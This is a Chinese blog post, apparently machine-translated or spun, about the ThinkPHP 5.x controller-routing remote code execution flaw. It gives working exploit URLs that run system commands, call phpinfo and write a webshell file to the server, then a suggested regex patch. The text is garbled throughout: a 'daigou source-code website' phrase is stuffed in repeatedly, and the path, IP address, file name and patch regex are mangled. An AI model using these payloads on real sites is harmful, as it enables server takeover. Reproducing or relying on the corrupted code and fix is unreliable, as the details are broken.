发布时间:2019-1-7 分类: 行业资讯
THINKPHP漏洞修复,官方最近将thinkphp5.0的所有现有版本升级到5.1,以及补丁更新,此更新主要是为了进行一些bug修复,最严重的是现有的SQL注入漏洞,以及远程的漏洞代码执行查询系统已得到修复。官方认为没有问题,但在实际的安全检测中,它仍然是一个问题,或者它可以注入远程代码,插入非法字符,并提交给服务器后端。 。
关于此次发现的今日漏洞,让我们看看官方更新的代码文件是什么。更新的程序文件路径是库文件夹下think目录中的app.php,如下所示:
漏洞的原因在于控制器。这里,整个thinkphp框架中的函数不对控制器执行严格的安全过滤,因此攻击者可以伪造恶意参数来强制插入。最基本的原因是正则表达式是写的。不好,可以导致绕行。
在控制器获取控制器之后,直接执行分配,但不严格检查控制器的名称,因此可以使用斜杠等特殊代码进行远程代码注入。
让我们构建代购源码网站环境,apache + mysql + Linux centos系统,设置测试环境地址为http://127.0.01/anquan,我们可以在index.php之后直接伪造攻击参数,例子如下:
http://127.0.0.1/anquan/index.php?s=/index/hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=ls%20-l
直接提交到代购源码网站,可以直接查询当前代购源码网站根目录下的所有文件,截图如下:
通过此漏洞,您还可以通过远程代码注入直接执行phpinfo语句。查询存储在php.ini中的当前php版本,路径,扩展名和地址。您可以看到以下代码。
http://127.0.0.1/anquan/index.php?s=/index/hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=php%20-r%20'phpinfo(); “
有些人可能会问,既然你可以通过phpinfo查询目录文件,你能不能将shell写入代购源码网站的木马文件到代购源码网站?答案是肯定的,我们用一句写入safe.php的木马代码来测试它。
http://127.0.0.1/anquan/index.php?s=/index/hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27%27%20>%20safe .PHP
对这种思维方式的利用和分析已经结束。该漏洞是一个高风险漏洞。危害很严重。许多升级和更新补丁的代购源码网站都会受到攻击。有些代购源码网站会被绞死。如何修复thinkphp?漏洞?替换以前的正则表达式,需要部署代购源码网站目录的权限,防止生成php文件,修复代购源码网站上的漏洞,或重置代购源码网站安全参数,使其符合当前代购源码网站环境。如果您不知道如何修复代购源码网站漏洞,您还可以找到专业的代购源码网站安全公司来处理它。 Sinesafe和NSF,Venus等安全公司等国内公司更专业。
对于这种情况,我们需要更改库/think/App.php代码中的正则表达式,如果(!preg_match('/^ [A-Za-z] [w。] * $ /',$ controller)) {throw new HttpException(404,'controller not exists:'。$ controller); }
« 今年的中秋节,苏宁,京东等电子商务公司都在如何运用营销方式“回顾中秋节丹桂聪。花在杯子里。一个月的杯子。这跟楼上的一样。 ”的在一年一度的中秋节,家庭团聚的日子也是一些电子商务互联网公司所期待的假期,因为他们正在等待将中秋节作为产品的一大卖点。营销,实现绩效和改进的突破。他们的产品受欢迎,哪些公司成功营销? | 使用人工智能设计网页的10种方法 »